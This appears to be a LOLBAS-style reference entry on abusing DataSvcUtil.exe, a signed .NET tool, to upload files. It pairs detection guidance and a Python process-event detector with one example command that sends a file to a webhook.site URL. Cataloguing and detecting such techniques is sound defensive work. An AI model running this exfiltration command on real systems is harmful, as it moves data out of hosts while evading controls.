DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
Paths:
Acknowledgement:
Ialle Teixeira - @NtSetDefault
Detection:
The DataSvcUtil.exe tool is installed in the .NET Framework directory.
Prevent or detect DataSvcUtil connections to non-RFC1918 addresses with a network IPS/IDS.
Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.
DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
Usecase: Upload file
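The two detection notes above, combined into one host-side check over process-creation events. This is an added example, not part of the original entry: it assumes events arrive as dicts using Sysmon Event ID 1 field names (Image, User, CommandLine), and the sample events, account names and install path are constructed.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Assumption: events are dicts using Sysmon Event ID 1 field names.
EXPECTED_USERS = {r"NT AUTHORITY\SYSTEM", r"NT AUTHORITY\LOCAL SERVICE"}
RFC1918 = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
URI_ARG = re.compile(r'/uri:"?([^\s"]+)', re.IGNORECASE)

def is_non_rfc1918(host):
    """True for any host that is not an RFC1918 IP literal.
    Hostnames are not resolved here, so they count as non-RFC1918."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True
    return not any(ip in net for net in RFC1918)

def evaluate(event):
    """Return the reasons a process-creation event matches the two checks."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image != "datasvcutil.exe":
        return []
    reasons = []
    if event["User"].upper() not in EXPECTED_USERS:
        reasons.append("unexpected-account")
    match = URI_ARG.search(event["CommandLine"])
    host = urlsplit(match.group(1)).hostname if match else None
    if host and is_non_rfc1918(host):
        reasons.append("non-rfc1918-uri")
    return reasons

# Constructed sample events (not captured telemetry).
NETDIR = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\"
SAMPLES = [
    {"Image": NETDIR + "DataSvcUtil.exe", "User": "CORP\\alice",
     "CommandLine": "DataSvcUtil /out:C:\\Windows\\System32\\calc.exe "
                    "/uri:https://webhook.site/xxxxxxxxx?encodedfile"},
    {"Image": NETDIR + "DataSvcUtil.exe", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": "DataSvcUtil /out:C:\\build\\Model.cs "
                    "/uri:http://10.20.30.40/Northwind.svc"},
    {"Image": "C:\\Windows\\System32\\notepad.exe", "User": "CORP\\alice",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLES:
        print(ev["User"], evaluate(ev))
```

Because hostnames are not resolved, an internal OData service addressed by name is also flagged; allow-list known internal feed hosts before alerting on the second reason.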